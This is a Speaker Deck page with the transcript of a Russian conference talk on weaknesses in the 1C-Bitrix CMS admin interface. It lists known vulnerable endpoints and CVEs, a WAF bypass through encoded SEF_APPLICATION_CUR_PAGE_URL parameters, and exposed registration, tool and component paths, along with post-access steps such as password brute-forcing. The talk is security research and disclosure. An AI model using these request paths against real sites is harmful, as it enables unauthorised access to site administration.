Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Выйди и зайди нормально
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Bo0oM
September 13, 2023
Programming
99
0
Share
Выйди и зайди нормально
О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Bo0oM
September 13, 2023
More Decks by Bo0oM
See All by Bo0oM
Носок на сок
bo0om
0
1.9k
Защита от вредоносной автоматизации сегодня
bo0om
0
640
Defending against automatization using nginx
bo0om
0
890
Antibot pitch deck
bo0om
0
180
31337
bo0om
0
230
Your back is white
bo0om
0
390
FTP2RCE
bo0om
1
7.7k
Interpret it!
bo0om
0
1.2k
At Home Among Strangers
bo0om
1
4k
Other Decks in Programming
See All in Programming
AI-DLC Deep Dive
yuukiyo
2
240
Coding as Prompting Since 2025
ragingwind
0
790
PHP で mp3 プレイヤーを実装しよう
m3m0r7
PRO
0
250
Don't Prompt Harder, Structure Better
kitasuke
0
690
VueエンジニアがReactを触って感じた_設計の違い
koukimiura
0
170
Vibe하게 만드는 Flutter GenUI App With ADK , 박제창, BWAI Incheon 2026
itsmedreamwalker
0
550
Offline should be the norm: building local-first apps with CRDTs & Kotlin Multiplatform
renaudmathieu
0
190
Linux Kernelの1文字のミスで 権限昇格ができた話
rqda
0
2.3k
ネイティブアプリとWebフロントエンドのAPI通信ラッパーにおける共通化の勘所
suguruooki
0
260
アクセシビリティ試験の"その後"を仕組み化する
yuuumiravy
0
110
PHP でエミュレータを自作して Ubuntu を動かそう
m3m0r7
PRO
2
180
夢の無限スパゲッティ製造機 -実装篇- #phpstudy
o0h
PRO
0
200
Featured
See All Featured
GitHub's CSS Performance
jonrohan
1032
470k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
37
6.3k
Kristin Tynski - Automating Marketing Tasks With AI
techseoconnect
PRO
0
220
The Pragmatic Product Professional
lauravandoore
37
7.2k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
34
2.7k
Darren the Foodie - Storyboard
khoart
PRO
3
3.2k
SEO in 2025: How to Prepare for the Future of Search
ipullrank
3
3.4k
A designer walks into a library…
pauljervisheath
211
24k
Building Applications with DynamoDB
mza
96
7k
Leo the Paperboy
mayatellez
7
1.6k
Highjacked: Video Game Concept Design
rkendrick25
PRO
1
340
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
231
23k
Transcript
«Выйди и зайди нормально!» Anton Lopanitsyn
КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки
(защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM
Как обычно ломают Bitrix? • restore.php Система восстановления файлов в
Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев
Исправления
Исправления
None
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
None
None
None
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php
Install
None
Даже если взять и попасть в админку не удалось •
Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию
Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php
Tools
Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools /bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
None
None
Никто не знает, что тут
SiteGround - Reliable hosting with speed, security, and support you can count on.
bo0om
yuukiyo
ragingwind
m3m0r7
kitasuke
koukimiura
itsmedreamwalker
renaudmathieu
rqda
suguruooki
yuuumiravy
o0h
jonrohan
kevinliebholz
techseoconnect
lauravandoore
jcasabona
khoart
ipullrank
pauljervisheath
mza
mayatellez
rkendrick25
danielanewman
